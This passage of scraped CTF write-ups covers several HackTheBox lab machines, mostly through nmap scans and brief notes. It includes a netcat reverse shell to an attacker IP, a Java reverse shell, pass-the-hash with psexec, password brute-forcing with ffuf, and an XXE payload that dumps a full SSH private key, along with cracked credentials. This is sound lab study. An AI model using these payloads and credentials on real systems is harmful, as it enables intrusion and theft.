|\nEnumeration # Nmap # Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-03 06:02 EST Nmap scan report for 10.129.227.77 Host is up (0.12s latency). Not shown: 991 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT **| ftp-anon: Anonymous FTP login allowed (FTP code 230)** |_02-28-22 06:35PM \u0026lt;DIR\u0026gt; Users **22/tcp open ssh OpenSSH for_Windows_8.0 (protocol 2.0)** | ssh-hostkey: | 3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA) | 256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA) |_ 256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519) **80/tcp open http** |_http-title: Site doesn\u0026#39;t have a title (text/html). 
| fingerprint-strings: | GetRequest, HTTPOptions, RTSPRequest: | HTTP/1.1 200 OK | Content-type: text/html | Content-Length: 340 | Connection: close | AuthInfo: | \u0026lt;!DOCTYPE html PUBLIC \u0026#34;-//W3C//DTD XHTML 1.0 Transitional//EN\u0026#34; \u0026#34;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\u0026#34;\u0026gt; | \u0026lt;html xmlns=\u0026#34;http://www.w3.org/1999/xhtml\u0026#34;\u0026gt; | \u0026lt;head\u0026gt; | \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; | \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; | window.location.href = \u0026#34;Pages/login.htm\u0026#34;; | \u0026lt;/script\u0026gt; | \u0026lt;/head\u0026gt; | \u0026lt;body\u0026gt; | \u0026lt;/body\u0026gt; | \u0026lt;/html\u0026gt; | NULL: | HTTP/1.1 408 Request Timeout | Content-type: text/html | Content-Length: 0 | Connection: close |_ AuthInfo: 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5666/tcp open tcpwrapped 6699/tcp open napster? **8443/tcp open ssl/https-alt** | ssl-cert: Subject: commonName=localhost | Not valid before: 2020-01-14T13:24:20 |_Not valid after: 2021-01-13T13:24:20 | fingerprint-strings: | FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: | HTTP/1.1 404 | Content-Length: 18 | Document not found | GetRequest: | HTTP/1.1 302 | Content-Length: 0 | Location: /index.html | workers |_ jobs |_ssl-date: TLS randomness does not represent time **| http-title: NSClient++** |_Requested resource was /index.html 2 services unrecognized despite returning data. 
If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port80-TCP:V=7.95%I=7%D=3/3%Time=69A6BFC3%P=x86_64-pc-linux-gnu%r(NULL, SF:6B,\u0026#34;HTTP/1\\.1\\x20408\\x20Request\\x20Timeout\\r\\nContent-type:\\x20text/htm SF:l\\r\\nContent-Length:\\x200\\r\\nConnection:\\x20close\\r\\nAuthInfo:\\x20\\r\\n\\ SF:r\\n\u0026#34;)%r(GetRequest,1B4,\u0026#34;HTTP/1\\.1\\x20200\\x20OK\\r\\nContent-type:\\x20text SF:/html\\r\\nContent-Length:\\x20340\\r\\nConnection:\\x20close\\r\\nAuthInfo:\\x2 SF:0\\r\\n\\r\\n\\xef\\xbb\\xbf\u0026lt;!DOCTYPE\\x20html\\x20PUBLIC\\x20\\\u0026#34;-//W3C//DTD\\x20XH SF:TML\\x201\\.0\\x20Transitional//EN\\\u0026#34;\\x20\\\u0026#34;http://www\\.w3\\.org/TR/xhtml1/DT SF:D/xhtml1-transitional\\.dtd\\\u0026#34;\u0026gt;\\r\\n\\r\\n\u0026lt;html\\x20xmlns=\\\u0026#34;http://www\\.w3\\.o SF:rg/1999/xhtml\\\u0026#34;\u0026gt;\\r\\n\u0026lt;head\u0026gt;\\r\\n\\x20\\x20\\x20\\x20\u0026lt;title\u0026gt;\u0026lt;/title\u0026gt;\\r\\n\\x20\\x SF:20\\x20\\x20\u0026lt;script\\x20type=\\\u0026#34;text/javascript\\\u0026#34;\u0026gt;\\r\\n\\x20\\x20\\x20\\x20\\x20\\ SF:x20\\x20\\x20window\\.location\\.href\\x20=\\x20\\\u0026#34;Pages/login\\.htm\\\u0026#34;;\\r\\n\\x20 SF:\\x20\\x20\\x20\u0026lt;/script\u0026gt;\\r\\n\u0026lt;/head\u0026gt;\\r\\n\u0026lt;body\u0026gt;\\r\\n\u0026lt;/body\u0026gt;\\r\\n\u0026lt;/html\u0026gt;\\r\\n\u0026#34;)% SF:r(HTTPOptions,1B4,\u0026#34;HTTP/1\\.1\\x20200\\x20OK\\r\\nContent-type:\\x20text/html SF:\\r\\nContent-Length:\\x20340\\r\\nConnection:\\x20close\\r\\nAuthInfo:\\x20\\r\\n SF:\\r\\n\\xef\\xbb\\xbf\u0026lt;!DOCTYPE\\x20html\\x20PUBLIC\\x20\\\u0026#34;-//W3C//DTD\\x20XHTML\\x SF:201\\.0\\x20Transitional//EN\\\u0026#34;\\x20\\\u0026#34;http://www\\.w3\\.org/TR/xhtml1/DTD/xht 
SF:ml1-transitional\\.dtd\\\u0026#34;\u0026gt;\\r\\n\\r\\n\u0026lt;html\\x20xmlns=\\\u0026#34;http://www\\.w3\\.org/19 SF:99/xhtml\\\u0026#34;\u0026gt;\\r\\n\u0026lt;head\u0026gt;\\r\\n\\x20\\x20\\x20\\x20\u0026lt;title\u0026gt;\u0026lt;/title\u0026gt;\\r\\n\\x20\\x20\\x2 SF:0\\x20\u0026lt;script\\x20type=\\\u0026#34;text/javascript\\\u0026#34;\u0026gt;\\r\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x SF:20\\x20window\\.location\\.href\\x20=\\x20\\\u0026#34;Pages/login\\.htm\\\u0026#34;;\\r\\n\\x20\\x20\\ SF:x20\\x20\u0026lt;/script\u0026gt;\\r\\n\u0026lt;/head\u0026gt;\\r\\n\u0026lt;body\u0026gt;\\r\\n\u0026lt;/body\u0026gt;\\r\\n\u0026lt;/html\u0026gt;\\r\\n\u0026#34;)%r(RTS SF:PRequest,1B4,\u0026#34;HTTP/1\\.1\\x20200\\x20OK\\r\\nContent-type:\\x20text/html\\r\\nC SF:ontent-Length:\\x20340\\r\\nConnection:\\x20close\\r\\nAuthInfo:\\x20\\r\\n\\r\\n\\ SF:xef\\xbb\\xbf\u0026lt;!DOCTYPE\\x20html\\x20PUBLIC\\x20\\\u0026#34;-//W3C//DTD\\x20XHTML\\x201\\. SF:0\\x20Transitional//EN\\\u0026#34;\\x20\\\u0026#34;http://www\\.w3\\.org/TR/xhtml1/DTD/xhtml1-t SF:ransitional\\.dtd\\\u0026#34;\u0026gt;\\r\\n\\r\\n\u0026lt;html\\x20xmlns=\\\u0026#34;http://www\\.w3\\.org/1999/xh SF:tml\\\u0026#34;\u0026gt;\\r\\n\u0026lt;head\u0026gt;\\r\\n\\x20\\x20\\x20\\x20\u0026lt;title\u0026gt;\u0026lt;/title\u0026gt;\\r\\n\\x20\\x20\\x20\\x20 SF:\u0026lt;script\\x20type=\\\u0026#34;text/javascript\\\u0026#34;\u0026gt;\\r\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x2 SF:0window\\.location\\.href\\x20=\\x20\\\u0026#34;Pages/login\\.htm\\\u0026#34;;\\r\\n\\x20\\x20\\x20\\x SF:20\u0026lt;/script\u0026gt;\\r\\n\u0026lt;/head\u0026gt;\\r\\n\u0026lt;body\u0026gt;\\r\\n\u0026lt;/body\u0026gt;\\r\\n\u0026lt;/html\u0026gt;\\r\\n\u0026#34;); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port8443-TCP:V=7.95%T=SSL%I=7%D=3/3%Time=69A6BFCC%P=x86_64-pc-linux-gnu SF:%r(GetRequest,74,\u0026#34;HTTP/1\\.1\\x20302\\r\\nContent-Length:\\x200\\r\\nLocation: 
SF:\\x20/index\\.html\\r\\n\\r\\n\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\ SF:0\\0\\0\\0\\0\\0\\x12\\x02\\x18\\0\\x1aC\\n\\x07workers\\x12\\n\\n\\x04jobs\\x12\\x02\\x18 SF:\\x0b\\x12\\x0f\u0026#34;)%r(HTTPOptions,36,\u0026#34;HTTP/1\\.1\\x20404\\r\\nContent-Length:\\x2 SF:018\\r\\n\\r\\nDocument\\x20not\\x20found\u0026#34;)%r(FourOhFourRequest,36,\u0026#34;HTTP/1\\.1 SF:\\x20404\\r\\nContent-Length:\\x2018\\r\\n\\r\\nDocument\\x20not\\x20found\u0026#34;)%r(RT SF:SPRequest,36,\u0026#34;HTTP/1\\.1\\x20404\\r\\nContent-Length:\\x2018\\r\\n\\r\\nDocument SF:\\x20not\\x20found\u0026#34;)%r(SIPOptions,36,\u0026#34;HTTP/1\\.1\\x20404\\r\\nContent-Length: SF:\\x2018\\r\\n\\r\\nDocument\\x20not\\x20found\u0026#34;); No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required |_clock-skew: -1s | smb2-time: | date: 2026-03-03T11:04:56 |_ start_date: N/A TRACEROUTE (using port 1723/tcp) HOP RTT ADDRESS 1 114.12 ms 10.10.14.1 2 114.31 ms 10.129.227.77 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 179.12 seconds Dirbusting # Nothing w dirbuster on the other one either, anways lets come back here if we get stuck\nPort 21 # Since FTP was open with anon login lets check it out\nwe find the users Nadine Nathan lets add them to our users.txt\nNadine had a confidential txt\nNathan, **I left your Passwords.txt file on your Desktop.** Please remove this once you have edited it yourself and place it back into the secure folder. 
Regards Nadine So Nathan has a passwords.txt file on his desktop, interesting; we might have to get through Nathan first then\nand Nathan had a todo list\n1) Change the password for NVMS - Complete 2) Lock down the NSClient Access - Complete 3) Upload the passwords 4) Remove public access to NVMS 5) Place the secret files in SharePoint and the secret files are apparently in some SharePoint\nSubd # No subdomains either\nPort 80 # Port 8443 # Exploitation # So this service apparently has an LFI exploit\nlemme use this to try and grab the passwords.txt file\nAHHH, let's go through the others\nwell it worked manually…\ngreat, now let's use this with the user list against the ssh port\nshell access\nShell as Nadine # No interesting privs\nI only have access to Nadine's folder… let's see if we find anything interesting here\nlooking at NSClient++ in the Program Files folder we are able to find a .ini config file with this password\nlet's see if we can use it for Nathan\nand we have the version also\nnadine@SERVMON C:\\Program Files\\NSClient++\u0026gt;nscp --version NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64 Not able to log in though\nApparently only localhost is allowed, so we might have to do some port forwarding\nlet's tunnel with ssh\nsshpass -p \u0026#39;L1k3B1gBut7s@W0rk\u0026#39; ssh nadine@10.10.10.184 -L 8443:127.0.0.1:8443 , basically our local port 8443 now forwards to 127.0.0.1:8443 on the target. Let's get shell.bat and nc over to the system\nshell.bat\n\\programdata\\nc.exe 10.10.14.24 443 -e cmd Settings \u0026gt; external scripts \u0026gt; scripts, and then “+Add new”.\n","date":"3 March 2026","externalUrl":null,"permalink":"/ctf-writeups/servmon/","section":"CTF Writeups","summary":"","title":"Servmon","type":"ctf-writeups"},{"content":" Jeeves # Overview # OS: Windows IP: 10.129.228.112 Difficulty: Medium OSCP: Yes Lists: N/A Summary # Got in through the exposed Jenkins interface, privesc using a hash found through KeePass.\nLoot # Loot Category Details Usernames Passwords moonshine1 Usernames+Passwords Hashes Service 
Versions Enumeration # Nmap # PORT STATE SERVICE VERSION **80/tcp open http Microsoft IIS httpd 10.0** |_http-server-header: Microsoft-IIS/10.0 |_http-title: Ask Jeeves | http-methods: |_ Potentially risky methods: TRACE **135/tcp open msrpc Microsoft Windows RPC** **445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)** **50000/tcp open http Jetty 9.4.z-SNAPSHOT** |_http-title: Error 404 Not Found **|_http-server-header: Jetty(9.4.z-SNAPSHOT)** Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 2008|7|10|Phone|Vista|2012|11 (91%) OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_vista cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_11 Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows 10 1607 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Vista or Windows 7 (86%), Microsoft Windows Server 2008 R2 or Windows 7 SP1 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows 11 (85%), Microsoft Windows Embedded Standard 7 (85%) No exact OS matches for host (test conditions non-ideal). 
Network Distance: 2 hops **Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows** Host script results: | smb-security-mode: **| account_used: guest** | authentication_level: user **| challenge_response: supported** |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2026-03-02T18:28:14 |_ start_date: 2026-03-02T18:27:00 |_clock-skew: mean: 5h00m00s, deviation: 0s, median: 5h00m00s | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required TRACEROUTE (using port 135/tcp) HOP RTT ADDRESS 1 165.38 ms 10.10.14.1 2 165.47 ms 10.129.228.112 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 60.50 seconds Dirbusting # SMB # we know SMB is open and guest access is supported, so let's enumerate it first and grab the domain name as well\nstrange\nlet's check the website\nPort 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nPORT 50000 # None of the path traversal exploits seem to work; I didn't have much to work with, so I looked at the writeup and apparently I was supposed to use a raft wordlist and come across a page, weird\nExploitation # askjeeves # I validated this step using the evidence below before moving forward in the chain.\nString host=\u0026#34;10.10.14.137\u0026#34;;int port=1234;String cmd=\u0026#34;sh\u0026#34;;Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()\u0026gt;0)so.write(pi.read());while(pe.available()\u0026gt;0)so.write(pe.read());while(si.available()\u0026gt;0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); and we are in\nshell as kohsuke # nice, we can use 
printspoofer\nlet's try it\naand this didn't work, nor did GodPotato, so I think it's another route\nwe grab this kdbx file\nso I was able to crack the password\nmoonshine1\nTitle: Backup stuff Uname: ? Pass: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 URL: Notes: kpcli:/CEH\u0026gt; show -f 1 Title: Bank of America Uname: Michael321 Pass: 12345 URL: https://www.bankofamerica.com Notes: kpcli:/CEH\u0026gt; show -f 2 Title: DC Recovery PW Uname: administrator Pass: S1TjAtJHKsugh9oC4VZl URL: Notes: kpcli:/CEH\u0026gt; show -f 3 Title: EC-Council Uname: hackerman123 Pass: pwndyouall! URL: https://www.eccouncil.org/programs/certified-ethical-hacker-ceh Notes: Personal login kpcli:/CEH\u0026gt; show -f 4 Title: It\u0026#39;s a secret Uname: admin Pass: F7WhTrSFDKB6sxHU1cUn URL: http://localhost:8180/secret.jsp Notes: kpcli:/CEH\u0026gt; show -f 5 Title: Jenkins admin Uname: admin Pass: URL: http://localhost:8080 Notes: We don\u0026#39;t even need creds! Unhackable! let's use the first one (an LM:NT hash pair) to pass the hash and get an administrator shell\n└─$ impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 administrator@10.129.228.112 cmd.exe aand we are in\nlet's check the alternate data stream\ndir /R\nmore \u0026lt; hm.txt:root.txt ","date":"2 March 2026","externalUrl":null,"permalink":"/ctf-writeups/jeeves/","section":"CTF Writeups","summary":"","title":"Jeeves","type":"ctf-writeups"},{"content":" Markup # Overview # OS: Windows IP: 10.129.92.142 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # XXE.\nLoot # Loot Category Details Usernames admin Passwords password Usernames+Passwords admin:password Hashes Service Versions Enumeration # Nmap # Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-03-02 06:19 CST Nmap scan report for 10.129.95.192 Host is up (0.0082s latency). 
Not shown: 65532 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0) | ssh-hostkey: | 3072 9f:a0:f7:8c:c6:e2:a4:bd:71:87:68:82:3e:5d:b7:9f (RSA) | 256 90:7d:96:a9:6e:9e:4d:40:94:e7:bb:55:eb:b3:0b:97 (ECDSA) |_ 256 f9:10:eb:76:d4:6d:4f:3e:17:f3:93:d6:0b:8c:4b:81 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28) |_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-title: MegaShopping 443/tcp open ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28) |_ssl-date: TLS randomness does not represent time |_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28 | tls-alpn: |_ http/1.1 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | ssl-cert: Subject: commonName=localhost | Not valid before: 2009-11-10T23:48:47 |_Not valid after: 2019-11-08T23:48:47 |_http-title: MegaShopping Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019 (88%) Aggressive OS guesses: Microsoft Windows Server 2019 (88%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 7.29 ms 10.10.14.1 2 7.93 ms 10.129.95.192 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 29.57 seconds Dirbusting # nothing useful Port 80 # just a login page\nExploitation # we re able to bruteforce the creds\n┌─[eu-starting-point-vip-1-dhcp]─[10.10.15.210]─[htb-mp-1856650@htb-fkehukqxns]─[~] └──╼ [★]$ ffuf -w /usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt -X POST -d \u0026#34;username=admin\u0026amp;password=FUZZ\u0026#34; -H \u0026#34;Content-Type: application/x-www-form-urlencoded\u0026#34; -u http://10.129.95.192/ -fc 200 /\u0026#39;___\\ /\u0026#39;___\\ /\u0026#39;___\\ /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \\/_/ \\/_/ \\/___/ \\/_/ v2.1.0-dev ________________________________________________ :: Method : POST :: URL : http://10.129.95.192/ :: Wordlist : FUZZ: /usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt :: Header : Content-Type: application/x-www-form-urlencoded :: Data : username=admin\u0026amp;password=FUZZ :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response status: 200 ________________________________________________ :: Progress: [1/101] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors:password [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 26ms] :: Progress: [43/101] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors:: Progress: [89/101] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors:: Progress: [101/101] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Error:: Progress: [101/101] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 :: ┌─[eu-starting-point-vip-1-dhcp]─[10.10.15.210]─[htb-mp-1856650@htb-fkehukqxns]─[~] └──╼ [★]$ ffuf -w 
/usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt -X POST -d \u0026#34;username=admin\u0026amp;password=FUZZ\u0026#34; -H \u0026#34;Content-Type: application/x-www-form-urlencoded\u0026#34; -u http://10.129.95.192/ -fc 200 /\u0026#39;___\\ /\u0026#39;___\\ /\u0026#39;___\\ /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \\/_/ \\/_/ \\/___/ \\/_/ v2.1.0-dev ________________________________________________ :: Method : POST :: URL : http://10.129.95.192/ :: Wordlist : FUZZ: /usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt :: Header : Content-Type: application/x-www-form-urlencoded :: Data : username=admin\u0026amp;password=FUZZ :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response status: 200 ________________________________________________ password [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 122ms] :: Progress: [101/101] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 :: lets see now\nXXE # Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 !DOCTYPE foo [\u0026lt;!ENTITY xxe SYSTEM \u0026#34;file:///c:/users/daniel/.ssh/id_rsa\u0026#34;\u0026gt;]\u0026gt; Your order for -----BEGIN OPENSSH PRIVATE KEY----- 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 -----END OPENSSH PRIVATE KEY----- has been processed ","date":"2 March 2026","externalUrl":null,"permalink":"/ctf-writeups/markup/","section":"CTF Writeups","summary":"","title":"Markup","type":"ctf-writeups"},{"content":" Boardlight # Overview # OS: Linux IP: 10.129.231.37 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Got in through discovered subdomain with a exploit, escalated w conf file cred reuse, and then esc to root using known exploit.\nLoot # Loot Category Details Usernames $dolibarr_main_db_user=\u0026lsquo;dolibarrowner\u0026rsquo;; , larissa Passwords $dolibarr_main_db_pass=\u0026lsquo;serverfun2$2023!!\u0026rsquo;; Usernames+Passwords larissa:serverfun2$2023!! Hashes dollibar:$2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm Service Versions Enumeration # Nmap # ──(kali㉿kali)-[~/Desktop/vpn] └─$ nmap 10.129.231.37 -sCV -p- -Pn --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-01 15:04 EST Nmap scan report for boardlight.htb (10.129.231.37) Host is up (0.12s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA) | 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA) |_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Site doesn\u0026#39;t have a title (text/html; charset=UTF-8). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
